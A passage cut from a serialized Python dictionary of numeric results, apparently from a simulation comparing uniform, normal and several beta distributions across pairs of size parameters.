'beta1': 1.1430497852421209, 'beta2': 2.0677243693780016, 'beta4': 0.9643198579006903}, 100: {'uni': 1.1146343746429301, 'nor': 1.2892625248535499, 'beta1': 1.1776396387898163, 'beta2': 1.743862063916319, 'beta4': 1.0907431681894812}, 75: {'uni': 1.171991772371465, 'nor': 1.291285943681346, 'beta1': 1.1174834150199906, 'beta2': 1.4616564016626328, 'beta4': 1.151666583903703}, 50: {'uni': 1.154657400536598, 'nor': 1.1767961384785905, 'beta1': 1.1536256117334385, 'beta2': 1.43287463536852, 'beta4': 1.107820297759248}, 30: {'uni': 1.1398655580396513, 'nor': 1.142777717811652, 'beta1': 1.0608317535206289, 'beta2': 1.221456001179484, 'beta4': 1.1455911895467061}, 20: {'uni': 1.1039461056449387, 'nor': 1.206766578001503, 'beta1': 1.1269090338108658, 'beta2': 1.1721728315710964, 'beta4': 1.0682592850872188}, 10: {'uni': 1.1121748796693274, 'nor': 1.0749796486931948, 'beta1': 1.0466446681695234, 'beta2': 1.1960619623270785, 'beta4': 1.0802444621913325}}, 750: {1000: {'uni': 1.137661637991768, 'nor': 2.4752561072308645, 'beta1': 1.1582570984642369, 'beta2': 6.863542226032837, 'beta4': 0.6697597937935655}, 750: {'uni': 1.1143294017010406, 'nor': 2.2785887849344943, 'beta1': 1.1814831042585445, 'beta2': 5.4011216297097295, 'beta4': 0.7167053163957068}, 500: {'uni': 1.2511652529854431, 'nor': 1.827338619863956, 'beta1': 1.1412613149111919, 'beta2': 3.8244704455741334, 'beta4': 0.8517746234898397}, 400: {'uni': 1.1399104518317567, 'nor': 1.5874288173312812, 'beta1': 1.155582328147835, 'beta2': 3.1656085392977387, 'beta4': 0.8663874082318641}, 300: {'uni': 1.2225469901339128, 'nor': 1.5167836319695944, 'beta1': 1.11153781169305, 'beta2': 2.8873516129801815, 'beta4': 0.8996920327733064}, 200: {'uni': 1.0954755318435172, 'nor': 1.3881493471941568, 'beta1': 1.2269055582277115, 'beta2': 2.262420348293941, 'beta4': 1.013070644375399}, 150: {'uni': 1.3045698538839274, 'nor': 1.3196920805811456, 'beta1': 1.1880572964427405, 'beta2': 2.0558617667281225, 'beta4': 1.005991272842099}, 100: {'uni': 1.2187792043393142, 'nor': 1.2533805083824479, 'beta1': 1.1698674176276556, 'beta2': 1.7781988429118438, 'beta4': 1.0477156844601478}, 75: {'uni': 1.1368638382518677, 'nor': 1.3156273710113595, 'beta1': 1.1384065945892738, 'beta2': 1.520728851249668, 'beta4': 1.0715347444966783}, 50: {'uni': 1.1195348740382625, 'nor': 1.2217075820491097, 'beta1': 1.1191859871430045, 'beta2': 1.3208187892571224, 'beta4': 1.1549001358545659}, 30: {'uni': 1.2816617391006735, 'nor': 1.2457247512395753, 'beta1': 1.1579985679748264, 'beta2': 1.3374626422140403, 'beta4': 1.1743891961050419}, 20: {'uni': 1.1321158030897833, 'nor': 1.1806020500811683, 'beta1': 1.1445242993856557, 'beta2': 1.1994374982211218, 'beta4': 1.0684569229520247}, 10: {'uni': 1.0482034958303017, 'nor': 1.0837601898005667, 'beta1': 1.0616779987167078, 'beta2': 1.1126761632690636, 'beta4': 1.0098509988531303}}, 500: {1000: {'uni': 1.1750378415145837, 'nor': 3.146869341864523, 'beta1': 1.113523047098788, 'beta2': 7.532147143627789, 'beta4': 0.6366690553578839}, 750: {'uni': 1.073306431010815, 'nor': 2.785506492082125, 'beta1': 1.1569419751158654, 'beta2': 6.701734906168857, 'beta4': 0.6590873491367498}, 500: {'uni': 1.1865494646206205, 'nor': 2.1537630818158573, 'beta1': 1.1695402434000157, 'beta2': 4.861449944969511, 'beta4': 0.7573972651495522}, 400: {'uni': 1.2559700162444911, 'nor': 1.9444291825832516, 'beta1': 1.1664548294006372, 'beta2': 4.115283654847902, 'beta4': 0.7788833697755561}, 300: {'uni': 1.223882530974663, 'nor': 1.780734599585306, 'beta1': 1.181849766511381, 'beta2': 3.428927121287745, 'beta4': 0.8591100079004174}, 200: {'uni': 1.213711673102475, 'nor': 1.611703281792116, 'beta1': 1.111935660212546, 'beta2': 2.5258136249800422, 'beta4': 0.9379076876010537}, 150: {'uni': 1.1587728488156566, 'nor': 1.5088740961688971, 'beta1': 1.2536190947530212, 'beta2': 2.207157466230425, 'beta4': 0.9708178793619423}, 100: {'uni': 1.1068738509857443, 'nor': 1.4473315562593616, 'beta1': 1.2593071097914543, 'beta2': 1.9663232247120204, 'beta4': 1.039147765622215}, 75: {'uni': 1.2429995566003602, 'nor': 1.4276475545008478, 'beta1': 1.186401491303957, 'beta2': 1.632990789365755, 'beta4': 1.0812778097924176}, 50: {'uni': 1.237750828457372, 'nor': 1.2271226797959411, 'beta1': 1.1053381337393435, 'beta2': 1.4447132762085555, 'beta4': 1.0242240111478627}, 30: {'uni': 1.1636794654384857, 'nor': 1.2015932173450241, 'beta1': 1.1623019225244076, 'beta2': 1.320761147781629, 'beta4': 1.2103259711727377}, 20: {'uni': 1.0814390552372415, 'nor': 1.1400527764284605, 'beta1': 1.122921688334151, 'beta2': 1.2343857763528272, 'beta4': 1.1103764497171464}, 10: {'uni': 1.1215480866544199, 'nor': 1.1276367261668634, 'beta1': 1.0073667103864874, 'beta2': 1.1271701321078609, 'beta4': 1.064068238786582}}, 400: {1000: {'uni': 1.1709956621544848, 'nor': 3.803301620228012, 'beta1': 1.13585237795199, 'beta2': 7.931053647459394, 'beta4': 0.5668008916694507}, 750: {'uni': 1.123912386780943, 'nor': 3.0924072026943685, 'beta1': 1.2516107775524297, 'beta2': 6.555198333395497, 'beta4': 0.6761278412053991}, 500: {'uni': 1.1277026591617652, 'nor': 2.393764811280239, 'beta1': 1.2223718878397243, 'beta2': 4.682526270468999, 'beta4': 0.7026539605570044}, 400: {'uni': 1.171201628605453, 'nor': 2.1206626700151974, 'beta1': 1.195020309009892, 'beta2': 3.7936143215751352, 'beta4': 0.7015564268374034}, 300: {'uni': 1.1813580277825309, 'nor': 1.8319129414820265, 'beta1': 1.1583260826331316, 'beta2': 3.378981432298624, 'beta4': 0.8533135186126821}, 200: {'uni': 1.1527570203950765, 'nor': 1.6492093642401482, 'beta1': 1.1250559844035837, 'beta2': 2.629417175894674, 'beta4': 0.8945750181944908}, 150: {'uni': 1.1966402773104476, 'nor': 1.4174278460172554, 'beta1': 1.1312768855343165, 'beta2': 2.2423319800521555, 'beta4': 0.9353503917519674}, 100: {'uni': 1.1487242305792935, 'nor': 1.400351252329324, 'beta1': 1.1848680122044735, 'beta2': 1.9072201207315755, 'beta4': 1.0083131263386365}, 75: {'uni': 1.1734385077355995, 'nor': 1.3826407546880082, 'beta1': 1.0956863506586716, 'beta2': 1.7219247447211712, 'beta4': 1.1086330606702113}, 50: {'uni': 1.1837137777194917, 'nor': 1.3151632039352283, 'beta1': 1.167898128515975, 'beta2': 1.4839051821122797, 'beta4': 1.0817886556398897}, 30: {'uni': 1.1650313696484893, 'nor': 1.2684226276255366, 'beta1': 1.122760714762532, 'beta2': 1.3189729090742208, 'beta4': 1.0940981521464919}, 20: {'uni': 1.1445136060864975, 'nor': 1.1454415023439262, 'beta1': 1.0925797846896976, 'beta2': 1.267593178190832, 'beta4': 1.0882883216948513}, 10: {'uni': 1.0560264235231998, 'nor': 1.1780906323573201, 'beta1': 1.0365397983316262, 'beta2': 1.1437958793156668, 'beta4': 1.016287458324461}}, 300: {1000: {'uni': 1.1505797365385941, 'nor': 4.331982512119483, 'beta1': 1.1139526735347547, 'beta2': 9.469263809036718, 'beta4': 0.542849311740626}, 750: {'uni': 1.1758261434978927, 'nor': 3.7290481255519583, 'beta1': 1.1923496914716087, 'beta2': 7.813559953651863, 'beta4': 0.6059835632672069}, 500: {'uni': 1.181728515502452, 'nor': 2.8712256613239457, 'beta1': 1.1977959623656436, 'beta2': 5.3781790741274165, 'beta4': 0.6234478378948898}, 400: {'uni': 1.1420679660149184, 'nor': 2.3454510655315164, 'beta1': 1.2012772998377752, 'beta2': 4.64756804396548, 'beta4': 0.666155987456551}, 300: {'uni': 1.1132548996793066, 'nor': 2.2274013347829453, 'beta1': 1.0796836030332582, 'beta2': 3.4437770711726863, 'beta4': 0.8163520973610869}, 200: {'uni': 1.1695817222952798, 'nor': 1.7692957815475774, 'beta1': 1.1599743996759757, 'beta2': 2.784382083562161, 'beta4': 0.8364451298764334}, 150: {'uni': 1.1817571982797672, 'nor': 1.719512245624431, 'beta1': 1.1978025668978505, 'beta2': 2.3534864673445894, 'beta4': 0.8565768776251864}, 100: {'uni': 1.183952315096221, 'nor': 1.5311458905668298, 'beta1': 1.131782485730847, 'beta2': 2.065732436043435, 'beta4': 0.9070335463490746}, 75: {'uni': 1.1480746566834228, 'nor': 1.4155218896185913, 'beta1': 1.1645957200211898, 'beta2': 1.7843845120779571, 'beta4': 0.9973361357799707}, 50: {'uni': 1.1639419532835191, 'nor': 1.3626331228109334, 'beta1': 1.1576578080881406, 'beta2': 1.5222432381565012, 'beta4': 1.0709215102821763}, 30: {'uni': 1.2301310659161497, 'nor': 1.2519404957045004, 'beta1': 1.1315882862377566, 'beta2': 1.3482208892257823, 'beta4': 0.9920244358608241}, 20: {'uni': 1.154653019366009, 'nor': 1.2100560060524455, 'beta1': 1.2026849490243208, 'beta2': 1.477574606464069, 'beta4': 1.0772871940370845}, 10: {'uni': 1.08910832130117, 'nor': 1.1103645382687262, 'beta1': 1.0673808704064862, 'beta2': 1.144662691366984, 'beta4': 1.0824579533858352}}, 200: {1000: {'uni': 1.1527787642817615, 'nor': 6.454939390926548, 'beta1': 1.1761298896109023, 'beta2': 12.297910366361974, 'beta4': 0.5037081183232093}, 750: {'uni': 1.2093814994351852, 'nor': 4.628672560837682, 'beta1': 1.1600526734627739, 'beta2': 9.183147402660344, 'beta4': 0.5551361589383061}, 500: {'uni': 1.2078272726618189, 'nor': 3.6466332747210433, 'beta1': 1.2130237412448794, 'beta2': 6.686631421443718, 'beta4': 0.5617242997884774}, 400: {'uni': 1.206977516155348, 'nor': 3.1488854332188554, 'beta1': 1.1540803837353022, 'beta2': 5.520291627506234, 'beta4': 0.6183140008339282}, 300: {'uni': 1.1905791517893638, 'nor': 2.6963294032580256, 'beta1': 1.1396662759898903, 'beta2': 4.265413520085283, 'beta4': 0.6410626330993713}, 200: {'uni': 1.1155796690656294, 'nor': 2.098305098276549, 'beta1': 1.129861528955905, 'beta2': 3.4165984530534477, 'beta4': 0.784023515637043}, 150: {'uni': 1.176017350862461, 'nor': 1.9602832396544383, 'beta1': 1.18064576730146, 'beta2': 2.771704811214909, 'beta4': 0.7694104604666213}, 100: {'uni': 1.1870479832591068, 'nor': 1.708131299253773, 'beta1': 1.1546257226851904, 'beta2': 2.286248548348897, 'beta4': 0.8911986069890743}, 75: {'uni': 1.186734186489011, 'nor': 1.5988674993523462, 'beta1': 1.0890720658424244, 'beta2': 1.884040222161873, 'beta4': 0.9033227590425998}, 50: {'uni': 1.1448055037301, 'nor': 1.3510145910314486, 'beta1': 1.158526641543175, 'beta2': 1.5553795378788289, 'beta4': 0.9721645833372996}, 30: {'uni': 1.115202194775155, 'nor': 1.2996741282115147, 'beta1': 1.151604190486726, 'beta2': 1.4787210055138473, 'beta4': 1.05355865908588}, 20: {'uni': 1.1079466886008744, 'nor': 1.3176829776291565, 'beta1': 1.1104919106516336, 'beta2': 1.2858026496544552, 'beta4': 1.0625767800782984}, 10: {'uni': 1.0683808504100314, 'nor': 1.2213539981021235, 'beta1': 1.094155600283174, 'beta2': 1.1698982620724598, 'beta4': 1.0161201783101628}}, 150: {1000: {'uni': 1.2740272992236636, 'nor': 8.04791996644241, 'beta1': 1.167362655814843, 'beta2': 14.321827882861626, 'beta4': 0.5086649989916667}, 750: {'uni': 1.163578075351652, 'nor': 6.333220872122603, 'beta1': 1.1618587854601885, 'beta2': 10.078630783844831, 'beta4': 0.4866217170790821}, 500: {'uni': 1.1934251513310499, 'nor': 4.505679280354665, 'beta1': 1.1117564582293078, 'beta2': 7.5194623975801616, 'beta4': 0.5705530231959766}, 400: {'uni': 1.122035316119931, 'nor': 3.8691391166773323, 'beta1': 1.1694419741982156, 'beta2': 6.038197010971595, 'beta4': 0.6158188741996781}, 300: {'uni': 1.1470464121082826, 'nor': 3.274151981698333, 'beta1': 1.1506222290932826, 'beta2': 4.984385703067292, 'beta4': 0.6333396610313405}, 200: {'uni': 1.098044155143792, 'nor': 2.442058113795611, 'beta1': 1.190113631847934, 'beta2': 3.5693409544554564, 'beta4': 0.6585422486234873}, 150: {'uni': 1.1798570227406169, 'nor': 2.148902743538671, 'beta1': 1.1146678037413222, 'beta2': 3.040356329025905, 'beta4': 0.7390811919239978}, 100: {'uni': 1.1275603196569395, 'nor': 1.8634314040985047, 'beta1': 1.194982037114541, 'beta2': 2.4529169572961322, 'beta4': 0.7908591909063069}, 75: {'uni': 1.1010305363772324, 'nor': 1.7694707664540448, 'beta1': 1.1666529715718625, 'beta2': 2.240058572032016, 'beta4': 0.8738369125828138}, 50: {'uni': 1.0912147396467624, 'nor': 1.565184178967182, 'beta1': 1.168396593748277, 'beta2': 1.7986102324845101, 'beta4': 0.9613948793245802}, 30: {'uni': 1.176564975653703, 'nor': 1.3666259356184134, 'beta1': 1.18788036406429, 'beta2': 1.5016532133782363, 'beta4': 1.0139702282396725}, 20: {'uni': 1.095065206271104, 'nor': 1.245541829425765, 'beta1': 1.108511879249995, 'beta2': 1.307809873245305, 'beta4': 1.0376227789112373}, 10: {'uni': 1.1024407913868932, 'nor': 1.088965057821255, 'beta1': 1.047559539941666, 'beta2': 1.2305914089743843, 'beta4': 1.0555065357965625}}, 100: {1000: {'uni': 1.1854021246412352, 'nor': 11.016060727019472, 'beta1': 1.2051656975636194, 'beta2': 15.957467784586559, 'beta4': 0.4992260856865924}, 750: {'uni': 1.2376115548225521, 'nor': 9.068522333669398, 'beta1': 1.244046634396399, 'beta2': 12.076005102020233, 'beta4': 0.5130977526919601}, 500: {'uni': 1.1648958063745838, 'nor': 6.1072839572345, 'beta1': 1.1268676414225556, 'beta2': 7.854398191492699, 'beta4': 0.49958427017588514}, 400: {'uni': 1.1512278350516503, 'nor': 5.392715793997558, 'beta1': 1.1696021387623763, 'beta2': 7.332529107921338, 'beta4': 0.5328982120077344}, 300: {'uni': 1.1043591222583407, 'nor': 4.4365428928964254, 'beta1': 1.1132005110374124, 'beta2': 5.628002146631942, 'beta4': 0.5536099970772167}, 200: {'uni': 1.1946682563618547, 'nor': 3.3521570330308985, 'beta1': 1.2773341961233582, 'beta2': 4.004404893156947, 'beta4': 0.5837234579894335}, 150: {'uni': 1.1871501213686806, 'nor': 2.6193172667330704, 'beta1': 1.2297350806502172, 'beta2': 3.2042632533037256, 'beta4': 0.664274700436926}, 100: {'uni': 1.1497621584178024, 'nor': 2.1108766254691096, 'beta1': 1.1782324016667887, 'beta2': 2.5577399519012474, 'beta4': 0.746926383653656}, 75: {'uni': 1.1351408307441955, 'nor': 1.9522867474160084, 'beta1': 1.17767812715346, 'beta2': 2.1504826050745596, 'beta4': 0.7800890585405549}, 50: {'uni': 1.1263071014294783, 'nor': 1.8648089116567583, 'beta1': 1.1165179662639755, 'beta2': 1.9238108413225985, 'beta4': 0.9041009123841088}, 30: {'uni': 1.0926805561594322, 'nor': 1.4407528275952637, 'beta1': 1.188495602696405, 'beta2': 1.4665059544892458, 'beta4': 0.9539791513025705}, 20: {'uni': 1.121846468062343, 'nor': 1.328793041952113, 'beta1': 1.1664944334710992, 'beta2': 1.4522639614141404, 'beta4': 0.9956736124755978}, 10: {'uni': 1.1204549491237221, 'nor': 1.2323011448950902, 'beta1': 1.0928258842828849, 'beta2': 1.1531922357852749, 'beta4': 1.0153739202425465}}, 75: {1000: {'uni': 1.332821520339607, 'nor': 15.930089443152745, 'beta1': 1.171289101639284, 'beta2': 18.174364842184723, 'beta4': 0.47321284305584627}, 750: {'uni': 1.237290264475581, 'nor': 11.490043022545008, 'beta1': 1.189059377730262, 'beta2': 14.62336228067083, 'beta4': 0.5246962209488442}, 500: {'uni': 1.1921816708526098, 'nor': 8.46428457112535, 'beta1': 1.1404773815220697, 'beta2': 9.354886012350446, 'beta4': 0.5042313193695894}, 400: {'uni': 1.172495477607942, 'nor': 7.06519806952231, 'beta1': 1.1409970424303444, 'beta2': 8.453757070459439, 'beta4': 0.5275066908015517}, 300: {'uni': 1.2465428749029002, 'nor': 5.077552364373244, 'beta1': 1.2207943511424872, 'beta2': 5.989394174052176, 'beta4': 0.5145819316096251}, 200: {'uni': 1.21364225652058, 'nor': 3.793546862065341, 'beta1': 1.143576109267149, 'beta2': 4.450035842097597, 'beta4': 0.5722235640628546}, 150: {'uni': 1.1973537999124575, 'nor': 3.209445041412377, 'beta1': 1.1671496584378878, 'beta2': 3.6863319201894784, 'beta4': 0.6184152779108703}, 100: {'uni': 1.0730621748849436, 'nor': 2.515170518881428, 'beta1': 1.124202789251099, 'beta2': 2.853910469618436, 'beta4': 0.7079223488677664}, 75: {'uni': 1.1908002668890179, 'nor': 2.164307715576605, 'beta1': 1.1022232454630696, 'beta2': 2.6088159557751553, 'beta4': 0.7334138456473607}, 50: {'uni': 1.1327461894839026, 'nor': 1.7201198114580145, 'beta1': 1.1319588983511386, 'beta2': 1.875704530171311, 'beta4': 0.8228333594398864}, 30: {'uni': 1.1604850914644518, 'nor': 1.507022954768851, 'beta1': 1.1184205952563668, 'beta2': 1.7049042795022542, 'beta4': 0.9090222616137686}, 20: {'uni': 1.0762655242253933, 'nor': 1.4024810972045139, 'beta1': 1.03796705073592, 'beta2': 1.4861849386146158, 'beta4': 0.9723829285399783}, 10: {'uni': 1.0557491101661625, 'nor': 1.1837049281841963, 'beta1': 1.166904154786038, 'beta2': 1.2828863202120704, 'beta4': 0.988651200103153}}, 50: {1000: {'uni': 1.4413407568858028, 'nor': 22.566743280217178, 'beta1': 1.2276482007225256, 'beta2': 23.056210692408463, 'beta4': 0.4660189481672189}, 750: {'uni': 1.2718280400240256, 'nor': 16.30493656353458, 'beta1': 1.1326711971589989, 'beta2': 17.81662862884342, 'beta4': 0.4728350561687182}, 500: {'uni': 1.172235040453299, 'nor': 11.8095459061109, 'beta1': 1.181820315426212, 'beta2': 11.662524110362135, 'beta4': 0.48534660865668927}, 400: {'uni': 1.2867021297441419, 'nor': 9.511213374630067, 'beta1': 1.2268838616908635, 'beta2': 9.279921733726201, 'beta4': 0.4945713984775927}, 300: {'uni': 1.1906774155008837, 'nor': 7.799766973090263, 'beta1': 1.1087965280456227, 'beta2': 7.004329940698066, 'beta4': 0.4948098176026741}, 200: {'uni': 1.206765832059108, 'nor': 5.495221421844641, 'beta1': 1.1424530528570438, 'beta2': 5.236791374243084, 'beta4': 0.5249512538272287}, 150: {'uni': 1.1170041207411467, 'nor': 4.3935496972015, 'beta1': 1.1360421454285754, 'beta2': 4.307820473968464, 'beta4': 0.5295783353350124}, 100: {'uni': 1.1694439140708475, 'nor': 3.225800948995303, 'beta1': 1.1621945829082418, 'beta2': 3.0646789563538985, 'beta4': 0.6485731805209067}, 75: {'uni': 1.1306779142265537, 'nor': 2.662959575031019, 'beta1': 1.1778740846961646, 'beta2': 2.4852673590966248, 'beta4': 0.7258091242476691}, 50: {'uni': 1.1941609396429214, 'nor': 2.268899895733848, 'beta1': 1.1179901890554762, 'beta2': 1.9249867348265446, 'beta4': 0.7226933151870409}, 30: {'uni': 1.1178041704281778, 'nor': 1.7330770857627482, 'beta1': 1.1113467743710106, 'beta2': 1.8092372960659309, 'beta4': 0.8367650025431632}, 20: {'uni': 1.083908466243809, 'nor': 1.7186907573668564, 'beta1': 1.083302381748618, 'beta2': 1.5393750399929973, 'beta4': 0.8843295960246518}, 10: {'uni': 1.0487945600677406, 'nor': 1.2709613436276843, 'beta1': 1.0965000588955878, 'beta2': 1.2197123454385659, 'beta4': 0.9498288164294515}}, 30: {1000: {'uni': 1.8025024634308071, 'nor': 34.25391130897347, 'beta1': 1.1885614558788913, 'beta2': 29.85311114615026, 'beta4': 0.44359490195802476}, 750: {'uni': 1.5718950453388483, 'nor': 25.931606992440997, 'beta1': 1.233787933808761, 'beta2': 22.222336937321206, 'beta4': 0.47171304922279156}, 500: {'uni': 1.403990081760866, 'nor': 19.873193730295956, 'beta1': 1.2365306225266401, 'beta2': 14.658302774468805, 'beta4': 0.47265105875053215}, 400: {'uni': 1.4005854960541118, 'nor': 14.275653195236494, 'beta1': 1.214820107700645, 'beta2': 11.752460418098707, 'beta4': 0.4649244188284235}, 300: {'uni': 1.3560572497527095, 'nor': 12.509697042432672, 'beta1': 1.1642210787364398, 'beta2': 8.687500402569903, 'beta4': 0.48001789365740266}, 200: {'uni': 1.3078770132829531, 'nor': 8.242370389013965, 'beta1': 1.1516547957019738, 'beta2': 6.242815309406197, 'beta4': 0.4898507763421597}, 150: {'uni': 1.2387509836120234, 'nor': 6.212710987107977, 'beta1': 1.0759699330173904, 'beta2': 4.88761333337693, 'beta4': 0.510446983736842}, 100: {'uni': 1.231601768722487, 'nor': 4.5761367907404225, 'beta1': 1.1487740706520697, 'beta2': 3.5175168730166617, 'beta4': 0.5486902188853022}, 75: {'uni': 1.0693543659957778, 'nor': 3.951109643287017, 'beta1': 1.159979011102066, 'beta2': 3.144205840473643, 'beta4': 0.6245822913647954}, 50: {'uni': 1.142865316506463, 'nor': 2.969464463659539, 'beta1': 1.1592908541069569, 'beta2': 2.3836666468730012, 'beta4': 0.6332045220521555}, 30: {'uni': 1.0780858467029557, 'nor': 2.2574174573745505, 'beta1': 1.1744480844394878, 'beta2': 1.8478740024591505, 'beta4': 0.7343335412858117}, 20: {'uni': 1.0661001511027859, 'nor': 1.8097097184403295, 'beta1': 1.1520955489343616, 'beta2': 1.589815348006933, 'beta4': 0.799204183667358}, 10: {'uni': 1.1068513962930462, 'nor': 1.4174803659728914, 'beta1': 1.0195412075619765, 'beta2': 1.2736913537907808, 'beta4': 0.9086670084626601}}, 20: {1000: {'uni': 2.1816898666989353, 'nor': 54.589719460785915, 'beta1': 1.2780684016305557, 'beta2': 34.326668467189265, 'beta4': 0.42822336518380305}, 750: {'uni': 2.008633513369925, 'nor': 44.01386503835255, 'beta1': 1.1910602410914366, 'beta2': 25.92566104708618, 'beta4': 0.4563357309045434}, 500: {'uni': 1.7305415449208486, 'nor': 27.626080265992513, 'beta1': 1.2716481133711786, 'beta2': 17.339855281822697, 'beta4': 0.45580442590011244}, 400: {'uni': 1.6535339448650972, 'nor': 22.71498971521692, 'beta1': 1.2541165554611715, 'beta2': 14.250093795750274, 'beta4': 0.4549406486288468}, 300: {'uni': 1.5052840944772048, 'nor': 17.85214260880071, 'beta1': 1.1639571625183778, 'beta2': 11.414421423641553, 'beta4': 0.4659886102645737}, 200: {'uni': 1.3497443785045566, 'nor': 12.360091713030048, 'beta1': 1.1717637987871659, 'beta2': 7.455419425198178, 'beta4': 0.47174970505848157}, 150: {'uni': 1.3331996994902409, 'nor': 9.288283829992508, 'beta1': 1.2506008956247794, 'beta2': 6.08397354138583, 'beta4': 0.4686509521384706}, 100: {'uni': 1.2687928512207793, 'nor': 6.558077105937877, 'beta1': 1.1613621405497763, 'beta2': 4.103340600228283, 'beta4': 0.48725121395441656}, 75: {'uni': 1.2299552447081301, 'nor': 5.171143302936504, 'beta1': 1.1199869147433412, 'beta2': 3.3288792386276485, 'beta4': 0.5273865297234503}, 50: {'uni': 1.090863672616496, 'nor': 3.700143871425098, 'beta1': 1.0922976037420196, 'beta2': 2.6115744897059754, 'beta4': 0.594876803029818}, 30: {'uni': 1.0853328914480391, 'nor': 2.646623445458865, 'beta1': 1.0736193852418847, 'beta2': 1.96046643608669, 'beta4': 0.6252246663540566}, 20: {'uni': 1.1496312474830275, 'nor': 2.003838638976139, 'beta1': 1.2149235284576705, 'beta2': 1.6737605753508866, 'beta4': 0.7318124922604088}, 10: {'uni': 1.0302973694434716, 'nor': 1.6481938151667288, 'beta1': 1.0090308312145542, 'beta2': 1.4427058937732395, 'beta4': 0.8372887168016149}}, 10: {1000: {'uni': 4.47761779649345, 'nor': 106.97243626351514, 'beta1': 1.7718712572599664, 'beta2': 50.89972781133419, 'beta4': 0.45035039981991665}, 750: {'uni': 3.524513869962408, 'nor': 77.33864323159318, 'beta1': 1.6594491239956215, 'beta2': 36.25193105958197, 'beta4': 0.45647026837978366}, 500: {'uni': 2.933652803232629, 'nor': 56.19541613997431, 'beta1': 1.412868106014215, 'beta2': 24.493194030260376, 'beta4': 0.45626898980087244}, 400: {'uni': 2.5868581455589927, 'nor': 41.97644401918418, 'beta1': 1.3845576358953788, 'beta2': 20.500958607909546, 'beta4': 0.4503472771888699}, 300: {'uni': 2.1638043642684397, 'nor': 31.371026430711506, 'beta1': 1.3272523442702153, 'beta2': 15.391703293162744, 'beta4': 0.426134575227121}, 200: {'uni': 1.8664012577325673, 'nor': 23.02116576643852, 'beta1': 1.1669422527582627, 'beta2': 9.917500823904055, 'beta4': 0.4686925986716054}, 150: {'uni': 1.7272031794635727, 'nor': 15.992174734196075, 'beta1': 1.1700097974836747, 'beta2': 7.593771525578843, 'beta4': 0.45209920535131604}, 100: {'uni': 1.5210995197369952, 'nor': 11.60348589966613, 'beta1': 1.2199502179320187, 'beta2': 5.80028326920741, 'beta4': 0.45568014305226345}, 75: {'uni': 1.3099777177647, 'nor': 9.081005946150388, 'beta1': 1.0858315960507317, 'beta2': 4.53706520639466, 'beta4': 0.4977455754301163}, 50: {'uni': 1.3698349812635664, 'nor': 6.4873540534480245, 'beta1': 1.1411439665960967, 'beta2': 3.223332209368324, 'beta4': 0.4833115916272488}, 30: {'uni': 1.113033156501957, 'nor': 4.298523360691007, 'beta1': 1.1621220740176146, 'beta2': 2.235410496252283, 'beta4': 0.515573259834472}, 20: {'uni': 1.15231886075087, 'nor': 3.1542586458579533, 'beta1': 1.0959485235296258, 'beta2': 1.8690482386517902, 'beta4': 0.6022690986627974}, 10: {'uni': 1.0545459710410021, 'nor': 2.1410930258529346, 'beta1': 1.0432471611208785, 'beta2': 1.366107687212368, 'beta4': 0.7483649469211368}}}, 0.005: {1000: {1000: {'uni': 0.8492986502558074, 'nor': 1.6502490676284018, 'beta1': 0.8928233637722481, 'beta2': 5.0465080846258035, 'beta4': 0.554324759981653}, 750: {'uni': 0.876649520000162, 'nor': 1.4627775450104223, 'beta1': 0.8927432912877891, 'beta2': 4.0831718791391065, 'beta4': 0.5839305121400691}, 500: {'uni': 0.8314273255127868, 'nor': 1.2427601107117765, 'beta1': 0.8616522044180317, 'beta2': 2.907878706545564, 'beta4': 0.6644891840401165}, 400: {'uni': 0.8711765218939584, 'nor': 1.1725637742176804, 'beta1': 0.8945007645711051, 'beta2': 2.513524008354758, 'beta4': 0.7063402078076012}, 300: {'uni': 0.866990878802388, 'nor': 1.0601280123390195, 'beta1': 0.871577011386766, 'beta2': 1.990868873830486, 'beta4': 0.732977364574049}, 200: {'uni': 0.8484587729105408, 'nor': 1.0344752399437118, 'beta1': 0.8685203061001582, 'beta2': 1.6180514467121998, 'beta4': 0.7806210956771433}, 150: {'uni': 0.863325702964267, 'nor': 1.0163561854641152, 'beta1': 0.8609990835029007, 'beta2': 1.4501812273816659, 'beta4': 0.7933909895157425}, 100: {'uni': 0.8535173498455411, 'nor': 0.9332321122550727, 'beta1': 0.855451185502481, 'beta2': 1.2836429881798883, 'beta4': 0.8283385948050672}, 75: {'uni': 0.8719646248874783, 'nor': 0.9339021717557474, 'beta1': 0.8834615749377533, 'beta2': 1.157371893819168, 'beta4': 0.8151331566491923}, 50: {'uni': 0.8588721072497052, 'nor': 0.9324710043913952, 'beta1': 0.8592057109555745, 'beta2': 1.005974174058964, 'beta4': 0.8441503729380052}, 30: {'uni': 0.8268972332475851, 'nor': 0.8939432944293645, 'beta1': 0.8637300328894056, 'beta2': 0.9696041216651038, 'beta4': 0.8349904563989077}, 20: {'uni': 0.8575101264137438, 'nor': 0.8505944620056278, 'beta1': 0.8252029433248387, 'beta2': 0.9138477219306325, 'beta4': 0.859578392201494}, 10: {'uni': 0.8358303873495666, 'nor': 0.8475060468582208, 'beta1': 0.8198935626927145, 'beta2': 0.8863798415821968, 'beta4': 0.8028217733408507}}, 750: {1000: {'uni': 0.8893529119601304, 'nor': 1.8735326010619875, 'beta1': 0.8535189782879702, 'beta2': 5.094330840454726, 'beta4': 0.5252869847576926}, 750: {'uni': 0.8662548201881118, 'nor': 1.5939108097202517, 'beta1': 0.8620863564259129, 'beta2': 3.9224913698305763, 'beta4': 0.5565068303406758}, 500: {'uni': 0.8687024244817314, 'nor': 1.3429858216869892, 'beta1': 0.8659273649776043, 'beta2': 2.8714917333330945, 'beta4': 0.6115318046265227}, 400: {'uni': 0.8477929303428912, 'nor': 1.303342679028703, 'beta1': 0.8809644810541455, 'beta2': 2.525131323735293, 'beta4': 0.6209718469957444}, 300: {'uni': 0.8455781800923797, 'nor': 1.1790701643940078, 'beta1': 0.8989754737431781, 'beta2': 2.0532709282654986, 'beta4': 0.7031938135827249}, 200: {'uni': 0.8523231827202161, 'nor': 1.0542529777285443, 'beta1': 0.8485149018797521, 'beta2': 1.6805292794311386, 'beta4': 0.7350427322547652}, 150: {'uni': 0.8396399434545224, 'nor': 1.0383213011327654, 'beta1': 0.8440622218870381, 'beta2': 1.4760254972629505, 'beta4': 0.7523241499310742}, 100: {'uni': 0.8566810026475448, 'nor': 1.0171647257308214, 'beta1': 0.8613367134797993, 'beta2': 1.3133239582389826, 'beta4': 0.7943525941981162}, 75: {'uni': 0.8660172203154917, 'nor': 0.9591045119200551, 'beta1': 0.8369295019442069, 'beta2': 1.1456508181998266, 'beta4': 0.8038265430699089}, 50: {'uni': 0.8916502682562102, 'nor': 0.9134648222438218, 'beta1': 0.8650674166134595, 'beta2': 1.049261212642131, 'beta4': 